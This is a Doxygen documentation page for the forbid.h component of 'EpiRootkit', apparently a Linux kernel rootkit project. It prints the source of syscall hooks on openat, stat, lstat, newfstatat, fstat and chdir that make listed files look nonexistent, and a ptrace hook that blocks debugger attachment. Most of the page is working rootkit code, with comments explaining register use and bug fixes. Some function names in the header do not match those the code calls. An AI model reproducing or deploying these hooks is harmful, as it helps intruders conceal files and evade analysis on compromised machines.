EpiRootkit
By STDBOOL
forbid.h File Reference
#include <linux/err.h>
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/namei.h>
#include <linux/ptrace.h>
#include <linux/spinlock.h>
#include <linux/types.h>
#include <linux/uaccess.h>
#include "config.h"

Classes

struct  forbidden_file
 

Functions

int add_forbidden_file (const char *path)
 
int remove_forbidden_file (const char *path)
 
int list_forbidden_files (char *buf, size_t buf_size)
 
bool path_is_forbidden (const char __user *u_path)
 
asmlinkage long notrace openat_hook (const struct pt_regs *regs)
 
asmlinkage long notrace stat_hook (const struct pt_regs *regs)
 
asmlinkage long notrace chdir_hook (const struct pt_regs *regs)
 
asmlinkage void notrace ptrace_hook (struct pt_regs *regs)
 

Variables

struct list_head forbidden_files_list
 
spinlock_t forbidden_files_lock
 
asmlinkage long(* __orig_openat )(const struct pt_regs *)
 
asmlinkage long(* __orig_newfstatat )(const struct pt_regs *)
 
asmlinkage long(* __orig_fstat )(const struct pt_regs *)
 
asmlinkage long(* __orig_lstat )(const struct pt_regs *)
 
asmlinkage long(* __orig_stat )(const struct pt_regs *)
 
asmlinkage long(* __orig_chdir )(const struct pt_regs *regs)
 
asmlinkage long(* __orig_ptrace )(const struct pt_regs *regs)
 

Function Documentation

◆ add_forbidden_file()

int add_forbidden_file ( const char *  path)

◆ chdir_hook()

asmlinkage long notrace chdir_hook ( const struct pt_regs *  regs)

Definition at line 66 of file forbid.c.

/*
 * chdir(2) hook: refuse to enter a directory on the forbidden list.
 *
 * x86-64 ABI: rdi carries the first (and only) argument of chdir, the
 * user-space pathname. forbid_contains() (forbid_api.c) decides whether the
 * string matches a forbidden entry; it receives the raw __user pointer and is
 * presumably responsible for the copy_from_user — verify there.
 *
 * Returns -ENOENT for a forbidden path so the directory looks absent rather
 * than access-denied; otherwise the original syscall's result.
 */
asmlinkage long notrace chdir_hook(const struct pt_regs *regs)
{
	const char __user *requested = (const char __user *)regs->di;

	if (!forbid_contains(requested))
		return __orig_chdir(regs);

	return -ENOENT;
}

◆ list_forbidden_files()

int list_forbidden_files ( char *  buf,
size_t  buf_size 
)

◆ openat_hook()

asmlinkage long notrace openat_hook ( const struct pt_regs *  regs)

Definition at line 13 of file forbid.c.

/*
 * openat(2) hook: refuse to open a path on the forbidden list.
 *
 * x86-64 ABI: openat(dfd, pathname, flags, mode), so the pathname is the
 * second argument, in rsi. The dfd in rdi is not consulted: only the raw
 * pathname string reaches forbid_contains(), so a relative pathname is
 * presumably matched as written rather than after resolution against dfd —
 * confirm against forbid_api.c.
 *
 * Returns -ENOENT for a forbidden path (the entry appears to not exist);
 * otherwise the original syscall's result.
 */
asmlinkage long notrace openat_hook(const struct pt_regs *regs)
{
	const char __user *pathname = (const char __user *)regs->si;

	if (!forbid_contains(pathname))
		return __orig_openat(regs);

	return -ENOENT;
}

◆ path_is_forbidden()

bool path_is_forbidden ( const char __user *  u_path)

◆ ptrace_hook()

asmlinkage void notrace ptrace_hook ( struct pt_regs *  regs)

Definition at line 73 of file forbid.c.

/*
 * ptrace(2) hook: deny attach/traceme/detach requests, pass the rest through.
 *
 * Unlike the other hooks in this file it returns void and takes a writable
 * pt_regs: the syscall result is stored directly in rax (regs->ax) instead of
 * being returned, so the installing code must treat it accordingly.
 *
 * x86-64 ABI: rdi is the first argument, the ptrace request code.
 *
 * The denial is unconditional: no pid, uid or capability check is made, so
 * every caller — legitimate debuggers included — gets -EPERM for these three
 * requests. The tracee pid (rsi) is never read; the original source only
 * contemplated a per-pid policy in a comment and never implemented one.
 */
asmlinkage void notrace ptrace_hook(struct pt_regs *regs)
{
	long request = regs->di;

	switch (request) {
	case PTRACE_ATTACH:
	case PTRACE_TRACEME:
	case PTRACE_DETACH:
		regs->ax = -EPERM;
		break;
	default:
		/* Anything else goes to the real handler unchanged. */
		regs->ax = __orig_ptrace(regs);
		break;
	}
}

◆ remove_forbidden_file()

int remove_forbidden_file ( const char *  path)

◆ stat_hook()

asmlinkage long notrace stat_hook ( const struct pt_regs *  regs)

Definition at line 20 of file forbid.c.

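/*
 * fstat(2) carries a descriptor, not a pathname, so the descriptor is resolved
 * back to a path with d_path() before the forbidden-list check.
 *
 * @fd: descriptor from the caller's rdi.
 *
 * Returns true only when the descriptor is valid, its path fit in the local
 * buffer and forbid_contains_str() matched it. Two cases were mishandled by
 * the original inline code and are fixed here:
 *  - an invalid fd made fget() return NULL, and fput(NULL) was still called,
 *    which oopses; the reference is now dropped only when fget() succeeded;
 *  - d_path() reports failure (e.g. a path longer than the buffer) with an
 *    ERR_PTR, not NULL, so the `if (full && ...)` test passed an error pointer
 *    to forbid_contains_str(); the result is now checked with IS_ERR().
 * A path that does not fit in the buffer is therefore treated as not
 * forbidden rather than dereferenced.
 */
static bool fstat_target_is_forbidden(int fd)
{
	/* Lives on the kernel stack, so PATH_MAX-sized would be too large;
	 * 512 bytes is the size the original code chose. */
	char buf_path[512];
	struct file *filp = fget(fd);
	char *full;
	bool hidden = false;

	if (!filp)
		return false;

	/* fget() pins filp and therefore its f_path for as long as we hold
	 * it; the extra path_get()/path_put() pair of the original was
	 * redundant. */
	full = d_path(&filp->f_path, buf_path, sizeof(buf_path));
	if (!IS_ERR(full))
		hidden = forbid_contains_str(full) != 0;

	fput(filp);
	return hidden;
}

/*
 * Shared hook for stat, lstat, newfstatat and fstat.
 *
 * The same handler is installed for four syscalls, so the syscall number in
 * regs->orig_ax selects both where the pathname lives and which original
 * handler to forward to (x86-64 ABI: rdi/rsi are the first two arguments).
 *
 * Returns -ENOENT when the target is on the forbidden list — the entry
 * appears not to exist — and also when orig_ax is none of the four expected
 * numbers. For the unexpected case the original code first handed a NULL
 * __user pointer to forbid_contains(); since both outcomes ended in -ENOENT
 * anyway, the call is skipped. Otherwise returns the original syscall's
 * result.
 */
asmlinkage long notrace stat_hook(const struct pt_regs *regs)
{
	const char __user *u_path = NULL;

	switch ((int)regs->orig_ax) {
	case __NR_stat:
	case __NR_lstat:
		/* stat(path, buf) / lstat(path, buf): pathname in rdi. */
		u_path = (const char __user *)regs->di;
		break;
	case __NR_newfstatat:
		/* newfstatat(dfd, path, buf, flags): pathname in rsi. dfd is
		 * not consulted, so a relative path is matched as written. */
		u_path = (const char __user *)regs->si;
		break;
	case __NR_fstat:
		if (fstat_target_is_forbidden((int)regs->di))
			return -ENOENT;
		return __orig_fstat(regs);
	default:
		return -ENOENT;
	}

	if (forbid_contains(u_path))
		return -ENOENT;

	switch ((int)regs->orig_ax) {
	case __NR_stat:
		return __orig_stat(regs);
	case __NR_lstat:
		return __orig_lstat(regs);
	case __NR_newfstatat:
		return __orig_newfstatat(regs);
	default:
		return -ENOENT;
	}
}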

Variable Documentation

◆ __orig_chdir

asmlinkage long (*__orig_chdir)(const struct pt_regs *regs)
extern

Definition at line 10 of file forbid.c.

◆ __orig_fstat

asmlinkage long (*__orig_fstat)(const struct pt_regs *regs)
extern

Definition at line 8 of file forbid.c.

◆ __orig_lstat

asmlinkage long (*__orig_lstat)(const struct pt_regs *regs)
extern

Definition at line 7 of file forbid.c.

◆ __orig_newfstatat

asmlinkage long (*__orig_newfstatat)(const struct pt_regs *regs)
extern

Definition at line 6 of file forbid.c.

◆ __orig_openat

asmlinkage long (*__orig_openat)(const struct pt_regs *regs)
extern

Definition at line 5 of file forbid.c.

◆ __orig_ptrace

asmlinkage long (*__orig_ptrace)(const struct pt_regs *regs)
extern

Definition at line 11 of file forbid.c.

◆ __orig_stat

asmlinkage long (*__orig_stat)(const struct pt_regs *regs)
extern

Definition at line 9 of file forbid.c.

◆ forbidden_files_list

struct list_head forbidden_files_list
extern

◆ forbidden_files_lock

spinlock_t forbidden_files_lock
extern